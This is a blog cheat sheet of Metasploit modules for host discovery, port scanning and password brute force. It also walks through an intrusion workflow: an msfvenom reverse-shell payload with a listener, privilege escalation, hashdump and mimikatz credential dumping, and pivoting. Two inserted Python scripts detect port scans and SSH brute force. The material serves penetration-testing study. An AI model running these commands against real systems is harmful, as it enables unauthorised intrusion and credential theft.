Marksec's Blog.

Summary of commonly used Metasploit modules

2018/07/06

Common msf modules

Host information gathering

Use the modules under auxiliary/scanner/discovery/ to scan for hosts.

Modules:

use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

Host port scanning

Use the modules under auxiliary/scanner/portscan/ to probe a host's ports.

Modules:

auxiliary/scanner/portscan/ack       // ACK firewall scan
auxiliary/scanner/portscan/ftpbounce // FTP bounce port scan
auxiliary/scanner/portscan/syn       // SYN port scan
auxiliary/scanner/portscan/tcp       // TCP connect port scan
auxiliary/scanner/portscan/xmas      // TCP "XMAS" port scan
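From the defender's side, the probe types above leave distinct TCP flag patterns in firewall or sensor logs. The following Python script is an added example (it is not from this post and not part of Metasploit) that classifies constructed packet records by their flags, treats any FIN+PSH+URG (XMAS) packet as an alert on its own, and reports bare-SYN or bare-ACK fan-out from one source across many ports. The sample records, the PORT_THRESHOLD value and the tcpdump-style flag letters are assumptions made for this example. A TCP connect scan shows up the same way as the SYN case here, because its first packet to each port is a plain SYN.

```python
from collections import defaultdict

# Constructed packet records as a host firewall would log them:
# (source IP, destination port, TCP flags). Flag letters follow tcpdump:
# S=SYN, A=ACK, F=FIN, P=PSH, U=URG, R=RST. Not captured from any real network.
SAMPLE_PACKETS = [
    # one source sends bare SYNs to six different ports: SYN (or connect) sweep
    ("10.0.0.5", 22, "S"), ("10.0.0.5", 80, "S"), ("10.0.0.5", 443, "S"),
    ("10.0.0.5", 445, "S"), ("10.0.0.5", 3389, "S"), ("10.0.0.5", 8080, "S"),
    # one source sends bare ACKs with no handshake to five ports: ACK probe
    ("10.0.0.7", 22, "A"), ("10.0.0.7", 25, "A"), ("10.0.0.7", 80, "A"),
    ("10.0.0.7", 110, "A"), ("10.0.0.7", 443, "A"),
    # a single FIN+PSH+URG packet: XMAS probe
    ("10.0.0.9", 80, "FPU"),
    # an ordinary HTTPS session: SYN, the final ACK of the handshake, then data
    ("10.0.0.11", 443, "S"), ("10.0.0.11", 443, "A"), ("10.0.0.11", 443, "PA"),
]

PORT_THRESHOLD = 5  # distinct ports from one source before SYN/ACK fan-out is reported (assumed value)


def classify_flags(flags):
    """Map a TCP flag string to the probe type it resembles, or 'other'."""
    f = set(flags)
    if f == {"F", "P", "U"}:
        return "xmas"   # FIN+PSH+URG without SYN/ACK never occurs in a real session
    if f == {"S"}:
        return "syn"    # bare SYN: half-open scan, or simply the start of any connection
    if f == {"A"}:
        return "ack"    # bare ACK: part of a handshake, or a firewall-mapping probe
    return "other"


def detect_scans(packets, port_threshold=PORT_THRESHOLD):
    """Return alerts for XMAS packets and for SYN/ACK fan-out across many ports."""
    ports = defaultdict(set)          # (src, kind) -> distinct destination ports
    for src, port, flags in packets:
        kind = classify_flags(flags)
        if kind != "other":
            ports[(src, kind)].add(port)
    alerts = []
    for (src, kind), touched in sorted(ports.items()):
        # XMAS is suspicious per packet; SYN and ACK are normal until they fan out
        if kind == "xmas" or len(touched) >= port_threshold:
            alerts.append({"src": src, "kind": kind, "ports": len(touched)})
    return alerts


if __name__ == "__main__":
    for a in detect_scans(SAMPLE_PACKETS):
        print(f"{a['src']:<12} {a['kind']:<5} distinct ports: {a['ports']}")
```

The normal session from 10.0.0.11 contributes one bare SYN and one bare ACK to a single port, so it stays under the threshold and produces no alert; a real detector would additionally track handshake state so that a bare ACK belonging to an established connection is never counted at all.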

SMB login scanning

Use the modules under auxiliary/scanner/smb/ for SMB-related operations.

Modules:

auxiliary/scanner/smb/pipe_auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor   // returns DCERPC information
auxiliary/scanner/smb/psexec_loggedin_users
auxiliary/scanner/smb/smb2                  // scans for the SMB2 protocol
auxiliary/scanner/smb/smb_enum_gpp
auxiliary/scanner/smb/smb_enumshares        // scans SMB shared files
auxiliary/scanner/smb/smb_enumusers         // enumerates system users over SMB
auxiliary/scanner/smb/smb_enumusers_domain
auxiliary/scanner/smb/smb_login             // SMB login
auxiliary/scanner/smb/smb_lookupsid         // scans the users of a group
auxiliary/scanner/smb/smb_uninit_cred
auxiliary/scanner/smb/smb_version           // scans the system version

SQL Server login scanning

Use the modules under auxiliary/scanner/mssql/ to probe SQL Server information.

Modules:

auxiliary/scanner/mssql/mssql_hashdump   // dumps password hashes
auxiliary/scanner/mssql/mssql_login      // password brute force
auxiliary/scanner/mssql/mssql_ping       // probes for instances
auxiliary/scanner/mssql/mssql_schemadump

SSH probe scanning

Use the modules under auxiliary/scanner/ssh/ to probe SSH information.

Modules:

auxiliary/scanner/ssh/cerberus_sftp_enumusers
auxiliary/scanner/ssh/detect_kippo
auxiliary/scanner/ssh/ssh_enumusers        // enumerates users
auxiliary/scanner/ssh/ssh_identify_pubkeys
auxiliary/scanner/ssh/ssh_login            // password brute force
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/scanner/ssh/ssh_version          // checks the version

FTP probe scanning

Use the modules under auxiliary/scanner/ftp/ to probe FTP information.

Modules:

auxiliary/scanner/ftp/anonymous
auxiliary/scanner/ftp/bison_ftp_traversal
auxiliary/scanner/ftp/ftp_login            // password brute force
auxiliary/scanner/ftp/ftp_version          // checks the version
auxiliary/scanner/ftp/konica_ftp_traversal
auxiliary/scanner/ftp/pcman_ftp_traversal
auxiliary/scanner/ftp/titanftp_xcrc_traversal

MySQL probe scanning

Use the modules under auxiliary/scanner/mysql/ to probe MySQL information.

Modules:

auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump     // dumps password hashes
auxiliary/scanner/mysql/mysql_login        // password brute force
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version      // checks the version
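Each of the service sections above carries a *_login module used for password brute force (smb_login, mssql_login, ssh_login, ftp_login, mysql_login). As an added example from the detection side, not from this post and not part of Metasploit, the following Python script parses constructed sshd auth log lines, counts failed logins per source address in a sliding time window, records which usernames were tried, and notes a success that follows a burst of failures. The log lines, the threshold of 5 failures within 60 seconds and the line format are assumptions made for this example; the same counting logic applies to SMB, FTP, MySQL or SQL Server authentication logs once parse_line is replaced with a parser for that service's log format.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog format (no year field); not taken from any real host.
SAMPLE_LOG = """\
Jul  6 10:00:01 web1 sshd[2101]: Failed password for root from 10.0.0.5 port 51002 ssh2
Jul  6 10:00:02 web1 sshd[2103]: Failed password for root from 10.0.0.5 port 51003 ssh2
Jul  6 10:00:02 web1 sshd[2105]: Failed password for invalid user admin from 10.0.0.5 port 51004 ssh2
Jul  6 10:00:03 web1 sshd[2107]: Failed password for invalid user test from 10.0.0.5 port 51005 ssh2
Jul  6 10:00:04 web1 sshd[2109]: Failed password for root from 10.0.0.5 port 51006 ssh2
Jul  6 10:00:05 web1 sshd[2111]: Accepted password for root from 10.0.0.5 port 51007 ssh2
Jul  6 10:00:09 web1 sshd[2113]: Failed password for alice from 10.0.0.8 port 40001 ssh2
Jul  6 10:02:30 web1 sshd[2120]: Accepted publickey for alice from 10.0.0.8 port 40002 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)

FAIL_THRESHOLD = 5   # failures from one source ...          (assumed value)
WINDOW_SECONDS = 60  # ... within this many seconds -> alert  (assumed value)


def parse_line(line):
    """Return a dict for an authentication result line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        # year-less syslog stamp; only differences between stamps are used below
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "result": m["result"],
        "user": m["user"],
        "src": m["src"],
    }


def detect_bruteforce(log_text, threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Sliding window per source: >= threshold failures inside `window` seconds -> alert.
    A later success from an alerting source is recorded as `success_after`."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    recent = defaultdict(list)   # src -> failures still inside the current window
    alerts = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        src = e["src"]
        if e["result"] == "Failed":
            q = recent[src]
            q.append(e)
            while (e["ts"] - q[0]["ts"]).total_seconds() > window:
                q.pop(0)   # expire failures that fell out of the window
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"failures": 0, "users": set(), "success_after": None})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(x["user"] for x in q)
        elif src in alerts and alerts[src]["success_after"] is None:
            alerts[src]["success_after"] = e["user"]
    for a in alerts.values():
        a["users"] = sorted(a["users"])
    return alerts


if __name__ == "__main__":
    for src, a in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{src}: {a['failures']} failures, users tried {a['users']}, "
              f"success afterwards: {a['success_after']}")
```

The single failure from 10.0.0.8 followed by a key-based login is the ordinary typo case and produces nothing; 10.0.0.5 crosses the threshold within a few seconds and then logs in, which is the pattern most worth paging on.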

Basic workflow for internal network operations

Generating an msf callback payload

Once we have a webshell, we generate an msf payload that connects back to us:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 -f exe > /root/Desktop/443.exe

Preparing the listener

Open msfconsole and get ready to receive the callback:

use exploit/multi/handler                    // use the handler (backdoor listener) module
set payload windows/meterpreter/reverse_tcp  // set the payload
show options
set LHOST 192.168.1.1                        // set the callback address
set lport 443                                // set the callback port
run

Checking basic status

getuid     // show the current user
getsystem  // attempt privilege escalation

Privilege escalation

background (or Ctrl+Z) sends the meterpreter session to the background; sessions -i <id> brings the session back. In msf, typing use exploit/windows/local/ and pressing TAB lists all the available local privilege-escalation modules.

msf exploit(handler) > use exploit/windows/local/             // load a Windows local module

Credential dumping and decryption

hashdump       // dump password hashes
load mimikatz  // load the mimikatz extension
kerberos       // view decrypted credentials

Adding a route to reach a new subnet

route                                   // view routes
background
sessions
route add 192.168.2.0 255.255.255.0 2   // add a route through session 2
search mssql                            // find mssql modules
use auxiliary/scanner/mssql/mssql_login // use the login module

Checking whether the machine is a virtual machine

meterpreter > run post/windows/gather/checkvm

Summary

The modules above are the ones we use most often in msf. Organizing these basic modules makes them more convenient to use later on. It really is a great tool; I'll write up the other modules gradually.
